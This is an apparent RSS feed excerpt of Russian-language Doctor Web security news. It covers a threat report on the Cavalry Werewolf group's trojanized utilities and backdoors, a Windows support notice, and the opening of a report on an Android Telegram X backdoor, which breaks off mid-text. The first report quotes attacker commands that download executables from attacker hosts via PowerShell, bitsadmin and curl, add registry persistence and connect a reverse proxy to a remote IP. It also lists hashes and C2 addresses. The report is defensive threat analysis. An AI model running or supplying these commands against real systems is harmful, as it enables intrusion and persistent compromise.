&lt;p&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt; — это троянские версии легитимных программ, в которые злоумышленники внедрили вредоносный код. Вирусные аналитики «Доктор Веб» встречали вредоносные модификации архиваторов WinRar и 7-Zip, средства разработки Visual Studio Code, текстового редактора AkelPad и ряда других приложений. Среди них, например, была программа Sumatra PDF Reader, которую киберпреступники выдавали за мессенджер MAX. Такие модификации перестают выполнять основную функциональность и при запуске инициализируют только добавленную к ним троянскую часть.&lt;/p&gt;
&lt;p&gt;В зависимости от целей киберпреступников в этих модификациях могут скрываться самые разные вредоносные программы. Среди них:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseProxy.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt; (&lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt; (&lt;a href="https://github.com/HavocFramework/Havoc" target="_blank"&gt;Havoc&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt; (CobaltStrike)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt; (AsyncRAT)&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Clipper.808&amp;lng=kk"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов Trojan.Packed2.49862&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Полезная нагрузка&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;rev2.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;8279ad4a8ad20bf7bbca0fc54428d6cdc136b776&lt;/td&gt;
            &lt;td&gt;188[.]127.231[.]136&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;revv.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a2326011368d994e99509388cb3dc132d7c2053f&lt;/td&gt;
            &lt;td&gt;192[.]168.11[.]10&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7zr.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winload.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;451cfa10538bc572d9fd3d09758eb945ac1b9437&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Command line RAR&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winlock.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;winsrv.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;firefox.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;bbe3a5ef79e996d9411c8320b879c5e31369921e&lt;/td&gt;
            &lt;td&gt;94[.]198.52[.]210&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;AkelPad.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e8ab26b3141fbb410522b2cbabdc7e00a9a55251&lt;/td&gt;
            &lt;td&gt;78[.]128.112[.]209&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;dcd374105a5542ef5100f6034c805878153b1205&lt;/td&gt;
            &lt;td&gt;192[.]168.88[.]104&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e51a65f50b8bb3abf1b7f2f9217a24acfb3de618&lt;/td&gt;
            &lt;td&gt;192[.]168.1[.]157&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;chromedriver.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;svc_host.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;dzveo09ww.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;max - для бизнеса.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231 &lt;/td&gt;
            &lt;td&gt;89[.]22.161[.]133&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;Характерные для группировки действия внутри скомпрометированной сети&lt;/h3&gt;
&lt;p&gt;После проникновения в компьютерную инфраструктуру целевой организации злоумышленники могут выполнять различные действия по сбору данных и дальнейшему закреплению в системе.&lt;/p&gt;
&lt;p&gt;Для получения информации о зараженном компьютере запускают команды:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;whoami&lt;/span&gt; — получить сведения о текущем пользователе;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\&amp;lt;user&amp;gt;\\Downloads&lt;/span&gt; — получить список файлов в каталоге «Загрузки» текущего пользователя;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\public\\pictures\\&lt;/span&gt; — получить список файлов в каталоге «Изображения» из общей директории (с целью определить какие вредоносные программы уже были загружены в систему);&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;ipconfig /all&lt;/span&gt; — получить конфигурацию сети;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;net user&lt;/span&gt; — получить список всех пользователей в системе.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для сбора информации о прокси-сервере и для проверки работоспособности сети используют команды:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com -x &amp;lt;proxy&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для настройки параметров сети используют:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;утилиту командной строки &lt;span class="string"&gt;netsh&lt;/span&gt;, входящую в состав ОС Windows.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для последующей доставки вредоносных инструментов в систему используют легитимные инструменты:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;PowerShell (например: &lt;span class="string"&gt;powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;Bitsadmin (например: &lt;span class="string"&gt;bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;curl (например: &lt;span class="string"&gt;curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe&lt;/span&gt;);&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для закрепления в системе:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;Могут модифицировать системный реестр Windows (например: &lt;span class="string"&gt;REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f&lt;/span&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для запуска своих инструментов используют командный интерпретатор cmd.exe. Например:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443&lt;/span&gt; — для запуска &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;C:\\users\\public\\pictures\\732.exe&lt;/span&gt;  — для запуска &lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для удаления инструментов могут использовать PowerShell. Например:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Злоумышленники также могут периодически проверять доступность С2-серверов через команду &lt;span class="string"&gt;ping&lt;/span&gt;.&lt;/p&gt;
&lt;h3&gt;Особенности группировки Cavalry Werewolf&lt;/h3&gt;
&lt;p&gt;Можно выделить следующие особенности злоумышленников из группировки Cavalry Werewolf:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;предпочитают использовать ПО с открытым кодом — как в исходном виде, так и в качестве основы для собственных разработок;&lt;/li&gt;
    &lt;li&gt;основными инструментами являются различные бэкдоры с функциональностью обратного шелла, позволяющие дистанционно выполнять команды в зараженных системах;&lt;/li&gt;
    &lt;li&gt;с целью сокрытия могут встраивать вредоносный код в изначально безобидные приложения;&lt;/li&gt;
    &lt;li&gt;часто применяют Telegram API для управления зараженными компьютерами;&lt;/li&gt;
    &lt;li&gt;для распространения первой ступени заражения проводят фишинговые рассылки якобы от имени государственных структур и используют для этого скомпрометированные email-адреса;&lt;/li&gt;
    &lt;li&gt;для загрузки последующих стадий заражения на целевое устройство используют директории &lt;span class="string"&gt;C:\\users\\public\\pictures&lt;/span&gt;, &lt;span class="string"&gt;C:\\users\\public\\libraries&lt;/span&gt;, &lt;span class="string"&gt;C:\\users\\public\\downloads&lt;/span&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Подробные технические описания выявленных инструментов Cavalry Werewolf находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».&lt;/p&gt;
&lt;p&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseProxy.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseShell.10&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.RShell.169&amp;lng=kk"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ShellNET.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ShellNET.2&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.Siggen2.5463&amp;lng=kk"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BackDoor.Tunnel.41&amp;lng=kk"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=BAT.DownLoader.1138&amp;lng=kk"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen31.54011&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Clipper.808&amp;lng=kk"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.FileSpyNET.5&amp;lng=kk"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Inject5.57968&amp;lng=kk"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49708&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49862&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;h3&gt;Матрица MITRE&lt;/h3&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Этап&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Техника&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Первоначальный доступ&lt;/td&gt;
            &lt;td&gt;Целевой фишинг с вложением (T1566.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Выполнение&lt;/td&gt;
            &lt;td&gt;Выполнение с участием пользователя (T1204)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Командная оболочка Windows (T1059.003)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Закрепление&lt;/td&gt;
            &lt;td&gt;Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001)&lt;br /&gt;&lt;br /&gt;BITS-задачи (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Повышение привилегий&lt;/td&gt;
            &lt;td&gt;Обход контроля учетных записей (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Предотвращение обнаружения&lt;/td&gt;
            &lt;td&gt;BITS-задачи (T1197)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Организация управления&lt;/td&gt;
            &lt;td&gt;Внешний прокси-сервер (T1090.002)&lt;br /&gt;&lt;br /&gt;Двусторонняя связь (T1102.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Эксфильтрация данных&lt;/td&gt;
            &lt;td&gt;Эксфильтрация по каналу управления (T1041)&lt;br /&gt;&lt;br /&gt;Эксфильтрация через веб-службу (T1567)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Cavalry%20Werewolf/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15073&amp;lng=kk</guid><title>Решения Dr.Web поддерживают все версии ОС Windows, начиная с Windows XP</title><link>https://news.drweb.kz/show/?i=15073&amp;lng=kk&amp;c=5</link><pubDate>Thu, 30 Oct 2025 07:02:35 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;В связи с официальным объявлением компании Microsoft о завершении поддержки операционной системы Windows 10 с 14 октября 2025 года, компания «Доктор Веб» информирует своих пользователей и партнеров о следующем.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;br&gt;&lt;span style="font-size:18px;"&gt;&lt;strong&gt;Поддержка продуктов Dr.Web на базе Windows 10&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;На текущий момент все версии решений Dr.Web полностью совместимы с операционной системой Windows 10. Мы подтверждаем, что:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Техническая поддержка, обновления антивирусных баз и программных компонентов Dr.Web продолжаются в штатном режиме;&lt;/li&gt;&lt;li&gt;После завершения поддержки со стороны Microsoft мы планируем и далее обеспечивать совместимость наших продуктов с Windows 10 — до тех пор, пока это возможно с учетом требований безопасности.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;br&gt;&lt;span style="font-size:18px;"&gt;&lt;strong&gt;Долгосрочная поддержка всех версий, начиная с Windows XP&lt;/strong&gt;&lt;/span&gt;&lt;br&gt;Несмотря на прекращение официальной поддержки многих версий ОС Windows, они по-прежнему активно используется в отдельных инфраструктурах — в том числе в промышленности, автоматизированных системах управления и специализированных корпоративных средах.&lt;br&gt;С учетом потребностей пользователей таких систем «Доктор Веб» продолжает обеспечивать поддержку всех версий ОС, начиная с Windows XP, в актуальных версиях решений Dr.Web для защиты рабочих станций.&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;div class="alert"&gt;&lt;p&gt;! Обращаем ваше внимание, что использование устаревших версий ОС связано с определенными рисками.&lt;/p&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Отсутствие обновлений безопасности оставляет уязвимости открытыми.&lt;/li&gt;&lt;li&gt;Несовместимость с современными версиями прикладного ПО (браузеры, драйверы и т.д.).&lt;/li&gt;&lt;li&gt;Повышенная вероятность компрометации — эксплойты для старых ОС широко доступны в открытых источниках, а атаки на уязвимые протоколы (SMBv1, TLS 1.0 и пр.) по-прежнему применяются злоумышленниками.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Даже если бизнес-процессы вашей компании критически зависят от данных систем, настоятельно рекомендуется запланировать миграцию на современные ОС, обеспечивающие обновления безопасности.&amp;nbsp;&lt;/strong&gt;&lt;br&gt;На период использования устаревших версий ОС необходимо изолировать узлы с данными ОС от интернета и основных корпоративных сегментов сети с помощью VLAN, DMZ или межсетевых экранов, а весь обмен данными с этими системами необходимо тщательно проверять на вредоносное содержание.&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15076&amp;lng=kk</guid><title>Серый кардинал Baohuo. Android-бэкдор захватывает учетные записи Telegram, получая над ними полный контроль</title><link>https://news.drweb.kz/show/?i=15076&amp;lng=kk&amp;c=5</link><pubDate>Thu, 23 Oct 2025 12:15:33 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;23 октября 2025 года&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Компания «Доктор Веб» выявила опасный бэкдор &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; в модифицированных злоумышленниками версиях мессенджера Telegram X. Помимо возможности похищать конфиденциальные данные, включая логин и пароль пользователя, а также историю переписки, это ВПО обладает рядом уникальных особенностей. Например, чтобы предотвратить свое обнаружение и скрыть факт компрометации учетной записи, &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; умеет скрывать в списке активных сеансов Telegram подключения со сторонних устройств. Кроме того, он может добавлять и исключать пользователя из Telegram-каналов, вступать от его лица в чаты и выходить из них, также скрывая эти действия. Фактически с его помощью злоумышленники получают полный контроль над учетной записью жертвы и функциями мессенджера, а сам троян является инструментом для накрутки числа подписчиков в Telegram-каналах. Киберпреступники управляют бэкдором в том числе через базу данных Redis, что ранее не встречалось в Android-угрозах. По оценкам наших специалистов общее число устройств, зараженных &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, превысило 58 000.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Распространение&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; началось в середине 2024 года, о чем свидетельствуют найденные при его анализе более ранние модификации. Основным способом доставки бэкдора на целевые устройства является реклама внутри мобильных приложений. Потенциальным жертвам демонстрируются объявления, в которых предлагается установить мессенджер Telegram X. При нажатии на баннер пользователи перенаправляются на вредоносные сайты, с которых и происходит загрузка троянского APK.&lt;/p&gt;&lt;p&gt;Эти сайты оформлены в стиле магазина приложений, а сам мессенджер позиционируется на них как площадка для удобного поиска партнера для общения и свиданий. Об этом говорят как баннеры с наложенным на них рекламным текстом о «бесплатных видеочатах» и с приглашениями «поговорить» (например, под видом скриншотов окна видеовызова), так и сочиненные злоумышленниками отзывы якобы довольных пользователей. Отметим, что на веб-страницах предусмотрена возможность выбора языка оформления, однако сами изображения при этом не меняются.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/01_Android.Backdoor.Baohuo.1.origin_web.png"&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/01_Android.Backdoor.Baohuo.1.origin_web.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;Один из вредоносных сайтов, с которых загружается троянская версия Telegram X. Потенциальным жертвам предлагается установить программу, где согласно «отзывам», легко найти партнера для общения и свиданий&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В настоящее время киберпреступники подготовили типовые шаблоны с баннерами только для двух языков: португальского с ориентиром на пользователей из Бразилии, а также индонезийского. Таким образом, жители Бразилии и Индонезии являются главной целью для атакующих. В то же время нельзя исключать, что со временем интерес злоумышленников распространится и на пользователей из других стран.&lt;/p&gt;&lt;p&gt;Изучение сетевой инфраструктуры атакующих позволило определить масштаб их деятельности. В среднем вирусные аналитики «Доктор Веб» наблюдают порядка 20 000 активных подключений &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;. При этом общее число зараженных устройств превысило 58 000. Заражению подверглись около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и даже автомобилей с бортовыми компьютерами на базе Android.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/02_Android.Backdoor.Baohuo.1.origin_map_ru.png"&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/02_Android.Backdoor.Baohuo.1.origin_map_ru.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;Страны с наибольшим числом устройств, зараженных&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; (по данным антивирусной лаборатории «Доктор Веб»)&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Однако&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; распространяется не только через вредоносные сайты: наши специалисты обнаружили его и в сторонних каталогах Android-приложений — например, APKPure, ApkSum и AndroidP. При этом в магазине APKPure он размещен от имени официального разработчика мессенджера, несмотря на то, что цифровые подписи оригинала и троянской модификации отличаются. Мы уведомили онлайн-площадки, в которых были найдены троянские версии Telegram X.&lt;/p&gt;&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;&lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/03_Android.Backdoor.Baohuo.1.origin_apkpute_patched.png"&gt;&lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/android-backdoor-baohuo/03_Android.Backdoor.Baohuo.1.origin_apkpute_patched.1.png" alt="#drweb"&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align:center;"&gt;&lt;i&gt;Модифицированный Telegram X с внедренным&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; распространялся в APKPure от имени настоящего разработчика мессенджера&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Антивирусная лаборатория «Доктор Веб» выявила несколько разновидностей &lt;a 